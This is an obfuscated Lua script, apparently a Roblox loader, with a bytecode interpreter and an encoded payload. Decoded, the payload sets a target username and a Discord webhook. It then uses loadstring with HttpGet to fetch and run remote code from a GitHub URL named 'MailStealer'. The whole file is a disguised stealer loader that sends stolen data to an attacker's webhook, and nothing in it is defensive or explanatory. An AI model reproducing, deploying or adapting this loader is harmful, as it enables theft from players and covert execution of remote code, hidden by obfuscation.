--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==7) then function v30(v31,v32,v33)local v34=v31[1];local v35=v31[2];local v36=v31[3];return function(...)local v66=v34;local v67=v35;local v68=v36;local v69=v28;local v70=1;local v71= -1;local v72={};local v73={...};local v74=v12("#",...) -1 ;local v75={};local v76={};for v81=0,v74 do if (v81>=v68) then v72[v81-v68 ]=v73[v81 + 1 ];else v76[v81]=v73[v81 + 1 ];end end local v77=(v74-v68) + 1 ;local v78;local v79;while true do v78=v66[v70];v79=v78[1];if (v79<=8) then if (v79<=3) then if (v79<=1) then if (v79==0) then v76[v78[2]]=v33[v78[3]];else local v107=0;local v108;while true do if (0==v107) then v108=v78[2];v76[v108]=v76[v108](v13(v76,v108 + 1 ,v71));break;end end end elseif (v79==2) then v76[v78[2]]();else v76[v78[2]]=v78[3];end elseif (v79<=5) then if (v79>4) then v76[v78[2]]();else v76[v78[2]]=v78[3]~=0 ;end elseif (v79<=6) then v76[v78[2]]=v33[v78[3]];elseif (v79>7) then local v128=0;local v129;local v130;while true do if (0==v128) then v129=v78[2];v130=v76[v78[3]];v128=1;end if (1==v128) then v76[v129 + 1 ]=v130;v76[v129]=v130[v78[4]];break;end end else local v131=0;local v132;local v133;local v134;local v135;while true do if (v131==2) then for v160=v132,v71 do local v161=0;while true do if (v161==0) then v135=v135 + 1 ;v76[v160]=v133[v135];break;end end end break;end if (v131==1) then v71=(v134 + v132) -1 ;v135=0;v131=2;end if (0==v131) then v132=v78[2];v133,v134=v69(v76[v132](v13(v76,v132 + 1 ,v78[3])));v131=1;end end end elseif (v79<=12) then if (v79<=10) then if (v79==9) then do return;end else local v114=0;local v115;while true do if (v114==0) then v115=v78[2];v76[v115]=v76[v115](v13(v76,v115 + 1 ,v71));break;end end end elseif (v79>11) then v76[v78[2]][v78[3]]=v78[4];else local v118=v78[2];local v119=v76[v78[3]];v76[v118 + 1 ]=v119;v76[v118]=v119[v78[4]];end elseif (v79<=14) then if (v79==13) then v76[v78[2]]=v78[3];else v76[v78[2]]=v78[3]~=0 ;end elseif (v79<=15) then v76[v78[2]][v78[3]]=v78[4];elseif (v79>16) then local v136=0;local v137;local v138;local v139;local v140;while true do if (v136==0) then v137=v78[2];v138,v139=v69(v76[v137](v13(v76,v137 + 1 ,v78[3])));v136=1;end if (v136==1) then v71=(v139 + v137) -1 ;v140=0;v136=2;end if (v136==2) then for v162=v137,v71 do v140=v140 + 1 ;v76[v162]=v138[v140];end break;end end else do return;end end v70=v70 + 1 ;end end;end return v30(v29(),{},v17)(...);end if (v18==3) then v24=nil;function v24()local v37,v38,v39,v40=v1(v16,v19,v19 + 3 );v19=v19 + (12 -8) ;return (v40 * 16777216) + (v39 * (187552 -122016)) + (v38 * (493 -237)) + v37 ;end v25=nil;v18=4;end if (v18==2) then function v22()local v41=v1(v16,v19,v19);v19=v19 + 1 ;return v41;end v23=nil;function v23()local v42=0 -0 ;local v43;local v44;while true do if (v42==(619 -(555 + 64))) then v43,v44=v1(v16,v19,v19 + 2 );v19=v19 + (933 -(857 + 74)) ;v42=569 -(367 + 201) ;end if (v42==(928 -(214 + 713))) then return (v44 * (11 + 54 + 191)) + v43 ;end end end v18=3;end if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v45,v46,v47)if v47 then local v84=(645 + 232) -(282 + 595) ;local v85;while true do if (v84==(1637 -(1523 + 114))) then v85=(v45/(2^(v46-(958 -(892 + 65)))))%((2 + 0)^(((v47-(1 -0)) -(v46-(1 -0))) + (1 -0))) ;return v85-(v85%(1066 -(68 + 997))) ;end end else local v86=(182 -((266 -199) + 113))^(v46-(1271 -((1178 -(802 + 150)) + 1044))) ;return (((v45%(v86 + v86))>=v86) and (4 -3)) or (117 -(32 + 85)) ;end end v22=nil;v18=2;end if (6==v18) then v29=nil;function v29()local v48=0;local v49;local v50;local v51;local v52;local v53;local v54;while true do local v80=0;while true do if (v80==0) then local v93=0;while true do if (v93~=(0 -0)) then else if (v48==(0 + 0)) then local v102=0 + 0 ;local v103;while true do if (v102==0) then v103=0;while true do if (v103==1) then v51={};v48=2 -1 ;break;end if (v103~=0) then else local v158=0;while true do if (v158==0) then v49={};v50={};v158=1 + 0 ;end if (v158~=1) then else v103=1;break;end end end end break;end end end if (v48==2) then local v104=0;while true do if (v104==(1131 -(87 + 1043))) then for v146=449 -(10 + 438) ,v24() do local v147=0 + 0 ;local v148;local v149;local v150;while true do if (v147==(0 -0)) then v148=0;v149=nil;v147=1 + 0 ;end if (v147~=1) then else v150=nil;while true do if ((1180 -(1123 + 57))==v148) then local v172=0 + 0 ;local v173;while true do if (v172==0) then v173=254 -(163 + 91) ;while true do if (v173==0) then local v181=0;while true do if (v181~=1) then else v173=1;break;end if (0==v181) then v149=1930 -(1869 + 61) ;v150=nil;v181=1 + 0 ;end end end if (v173==1) then v148=1;break;end end break;end end end if (v148==1) then while true do if (v149~=0) then else v150=v22();if (v21(v150,3 -2 ,1 -0 )~=(0 + 0)) then else local v177=0;local v178;local v179;local v180;while true do if (v177==(3 -0)) then if (v21(v179,3 + 0 ,1477 -(1329 + 145) )==(972 -(140 + 831))) then v180[1854 -(1409 + 441) ]=v54[v180[722 -(15 + 703) ]];end v49[v146]=v180;break;end if (v177~=(0 + 0)) then else local v183=438 -(262 + 176) ;local v184;while true do if (v183~=(1721 -(345 + 1376))) then else v184=0;while true do if (v184==0) then v178=v21(v150,690 -(198 + 490) ,3);v179=v21(v150,17 -13 ,6);v184=2 -1 ;end if (v184==(1207 -(696 + 510))) then v177=1 -0 ;break;end end break;end end end if (v177==2) then local v185=1262 -(1091 + 171) ;while true do if (v185==0) then if (v21(v179,1,1)==(1 + 0)) then v180[2]=v54[v180[2]];end if (v21(v179,6 -4 ,2)~=1) then else v180[9 -6 ]=v54[v180[377 -(123 + 251) ]];end v185=1;end if (v185==(4 -3)) then v177=3;break;end end end if (v177==(699 -(208 + 490))) then v180={v23(),v23(),nil,nil};if (v178==(202 -(14 + 188))) then local v188=675 -(534 + 141) ;local v189;while true do if (v188~=(0 + 0)) then else v189=0 + 0 ;while true do if (v189~=0) then else v180[3 + 0 ]=v23();v180[4]=v23();break;end end break;end end elseif (v178==1) then v180[6 -3 ]=v24();elseif (v178==(2 -0)) then v180[3]=v24() -(2^16) ;elseif (v178==(8 -5)) then local v198=0;local v199;local v200;while true do if (v198==(1 + 0)) then while true do if (v199==0) then v200=0 + 0 ;while true do if (v200==(396 -(115 + 281))) then v180[6 -3 ]=v24() -((2 + 0)^16) ;v180[9 -5 ]=v23();break;end end break;end end break;end if (v198==(0 -0)) then v199=0;v200=nil;v198=1;end end end v177=2;end end end break;end end break;end end break;end end end v48=3;break;end if (v104~=0) then else local v141=867 -(550 + 317) ;while true do if (v141==(0 -0)) then for v165=1 -0 ,v53 do local v166=0;local v167;local v168;local v169;while true do if ((0 -0)~=v166) then else v167=285 -(134 + 151) ;v168=nil;v166=1;end if (v166==1) then v169=nil;while true do if (v167==(1665 -(970 + 695))) then local v174=0 -0 ;local v175;while true do if (v174==0) then v175=0;while true do if (v175==(1990 -(582 + 1408))) then v168=v22();v169=nil;v175=1;end if (v175==(3 -2)) then v167=1 -0 ;break;end end break;end end end if (v167==1) then if (v168==(3 -2)) then v169=v22()~=0 ;elseif (v168==(1826 -(1195 + 629))) then v169=v25();elseif (v168~=3) then else v169=v26();end v54[v165]=v169;break;end end break;end end end v52[3]=v22();v141=1;end if ((1 -0)~=v141) then else v104=1;break;end end end end end v93=242 -(187 + 54) ;end if (v93==1) then v80=1;break;end end end if (v80~=(781 -(162 + 618))) then else if (v48==(3 + 0)) then for v98=1 + 0 ,v24() do v50[v98-(1 -0) ]=v29();end return v52;end if (v48~=1) then else local v97=0 -0 ;while true do if (v97==0) then v52={v49,v50,nil,v51};v53=v24();v97=1001 -(451 + 549) ;end if (v97==(1 + 0)) then v54={};v48=2 -0 ;break;end end end break;end end end end v30=nil;v18=7;end if (v18==4) then function v25()local v55=v24();local v56=v24();local v57=1 -0 ;local v58=(v21(v56,1,20) * ((1386 -((2148 -1402) + 638))^(13 + 19))) + v55 ;local v59=v21(v56,31 -(2 + 8) ,1487 -(282 + 1174) );local v60=((v21(v56,373 -(218 + 123) )==(1582 -(1535 + 46))) and  -(1 + (1024 -(706 + 318)))) or (1 + (811 -(569 + 242))) ;if (v59==(560 -(306 + (1505 -(721 + 530))))) then if (v58==(0 + 0)) then return v60 * (0 -(1271 -(945 + 326))) ;else v59=1468 -(899 + 568) ;v57=0 + 0 ;end elseif (v59==2047) then return ((v58==0) and (v60 * ((2 -(2 -1))/(603 -(268 + 335))))) or (v60 * NaN) ;end return v8(v60,v59-(1313 -(60 + 230)) ) * (v57 + (v58/((574 -(426 + 146))^52))) ;end v26=nil;function v26(v61)local v62=0;local v63;local v64;while true do if ((3 + 0)==v62) then return v6(v64);end if (v62==(700 -(28 + 243 + 429))) then v63=nil;if  not v61 then local v96=0 + 0 ;while true do if (v96==(1500 -(412 + 996 + 92))) then v61=v24();if (v61==0) then return "";end break;end end end v62=1;end if ((1087 -(461 + 625))==v62) then v63=v3(v16,v19,(v19 + v61) -1 );v19=v19 + v61 ;v62=1290 -(993 + 295) ;end if (v62==(1 + 1)) then v64={};for v94=1172 -(418 + 753) , #v63 do v64[v94]=v2(v1(v3(v63,v94,v94)));end v62=2 + 1 ;end end end v18=5;end if (0==v18) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v65)if (v1(v65,2)==79) then v20=v0(v3(v65,1,1));return "";else local v87=0;local v88;while true do if (v87==0) then v88=v2(v0(v65,16));if v20 then local v100=0;local v101;while true do if (v100==1) then return v101;end if (v100==0) then v101=v5(v88,v20);v20=nil;v100=1;end end else return v88;end break;end end end end);v18=1;end end end v15("LOL!093O0003023O005F4703083O00557365726E616D65030E3O00417A7572506C617973546869733303073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O31353639343238363836392O31393133372F6C3551527A4D464535454A7876376A64595677444E3671766874326C504C6C69654A764D45665A664A6131674B66743876434C4172547146696C6B2O4C616A774A796468030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403623O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F486F73742O655363726970747A2F486F73742O654875622F6D61696E2F2545322539432539372532304D61696C537465616C6572253230254532253943253937000D3O00124O00013O00300F3O0002000300124O00013O00300F3O0004000500124O00063O00122O000100073O00200B000100010008001203000300094O000E000400014O0011000100044O000A5O00022O00053O000100012O00103O00017O00",v9(),...);end
